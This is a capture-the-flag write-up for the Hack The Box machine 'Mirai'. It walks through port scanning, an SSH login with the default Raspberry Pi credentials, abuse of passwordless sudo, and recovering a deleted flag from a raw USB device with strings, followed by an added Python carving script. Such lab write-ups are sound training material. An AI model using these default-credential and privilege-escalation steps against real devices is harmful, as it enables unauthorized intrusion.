🕵 HTB-Writeup : MIRAI

Recon

nmap

└─$ nmap -A -timing 5 -p- 10.10.10.48  

53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1240/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
|_http-title: Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pi-hole interface

Guessing directory names on http://10.10.10.48, we find an admin page at http://10.10.10.48/admin.

Screenshot of the admin page

Here we are facing a Pi-hole web interface.

As the box is named Mirai, we can check for default credentials. Mirai is malware that tries to log in to IoT devices exposed on the Internet using default credentials, then uses the groups of infected devices to launch huge DDoS attacks.

I can’t find the password needed to log in to the Pi-hole interface; the password is randomly generated at install time.

Plex server

Then, on http://10.10.10.48:32400/, we are facing a Plex server with a login form.

Screenshot of the Plex login page

Same as for the Pi-hole server, I can’t find any default creds.

Since Pi-hole is typically installed on a Raspberry Pi, let’s try to connect to the SSH server using the Raspberry Pi default credentials pi:raspberry.

It works! We have a shell and can get the user flag!

We check the pi user’s sudo privileges.

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Oh we can get the roo… hum no :(

pi@raspberrypi:~ $ sudo cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Recover root.txt

Looking on the USB stick, we find another file, damnit.txt, in /media/usbstick, saying:

Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Thanks James! We can try to find the file elsewhere on the system; we get only two occurrences.

sudo find / -type f -name root.txt 2>/dev/null

/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt

The original file in /root, and another in /lib/live/mount/persistence/sda2/root, which is only the persistence mount of the live system (the same file seen through a different path, not a backup).

Speaking of mounts, let’s check all mounted volumes.

pi@raspberrypi:~ $ mount

sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
/dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
[...]
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)

We can see that the USB stick at /media/usbstick is the block device /dev/sdb. Deleting a file only unlinks it; its data blocks stay on the device until they are overwritten, so we can read the raw device and pull the flag out with the strings command.

pi@raspberrypi:~ $ sudo strings /dev/sdb

>r &
/media/usbstick
lost+found
root.txt
[...]
*************************13e020b
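To show why the flag was still readable off the raw device after the file was unlinked, here is a small carving script added to this writeup (not part of the original post or of any tool used on the box): it reimplements the printable-run scan of strings(1) with byte offsets, reads the device in chunks so a run that crosses a chunk boundary survives, and filters for the 32-hex-character HTB flag format. The image it scans is a constructed in-memory sample; on the box the same function would be fed the bytes of /dev/sdb, read as root.

```python
import io
import re
from typing import BinaryIO, Iterator, List, Tuple

# Constructed sample "raw device" image (not a real dump): filler bytes, the
# directory entry names ext4 leaves behind after an unlink, and the deleted
# file's contents still sitting in a now-unallocated block.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"\x01\xfe\x02\xfdlost+found\x00\x00root.txt\x00"
    + b"\xff" * 120
    + b"3d3e20ba95bb19df8eb12eb4ce40ac8e\n"  # constructed flag-like token
    + b"\x00" * 40
)

# HTB flags are 32 hex characters; swap this pattern for other artefacts.
FLAG_RE = re.compile(rb"^[0-9a-f]{32}$")


def carve_strings(stream: BinaryIO, min_len: int = 4,
                  chunk_size: int = 1 << 20) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, run) for every printable run of at least min_len bytes,
    like `strings -t d`. The device is read in chunks; a run that straddles a
    chunk boundary is carried over into the next chunk rather than split."""
    offset, run, run_start = 0, bytearray(), 0
    while chunk := stream.read(chunk_size):
        for i, byte in enumerate(chunk):
            if 0x20 <= byte < 0x7F or byte == 0x09:  # printable ASCII or tab
                if not run:
                    run_start = offset + i
                run.append(byte)
            else:
                if len(run) >= min_len:
                    yield run_start, bytes(run)
                run.clear()
        offset += len(chunk)
    if len(run) >= min_len:  # run that ends exactly at the end of the device
        yield run_start, bytes(run)


def carve_bytes(data: bytes, min_len: int = 4,
                chunk_size: int = 1 << 20) -> List[Tuple[int, bytes]]:
    """Carve an in-memory image (e.g. the bytes read from /dev/sdb)."""
    return list(carve_strings(io.BytesIO(data), min_len, chunk_size))


def find_flag_candidates(data: bytes, chunk_size: int = 1 << 20) -> List[Tuple[int, bytes]]:
    """Keep only carved strings that look like an HTB flag."""
    return [(off, s) for off, s in carve_bytes(data, chunk_size=chunk_size) if FLAG_RE.match(s)]


if __name__ == "__main__":
    for off, s in find_flag_candidates(SAMPLE_IMAGE):
        print(f"offset {off}: {s.decode()}")
```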

Tags

Default Credentials, Easy, External, IoT, Pi-Hole, Penetration Tester Level 1, A05:2021-Security Misconfiguration, Forensics, Sudo Exploitation, Information Disclosure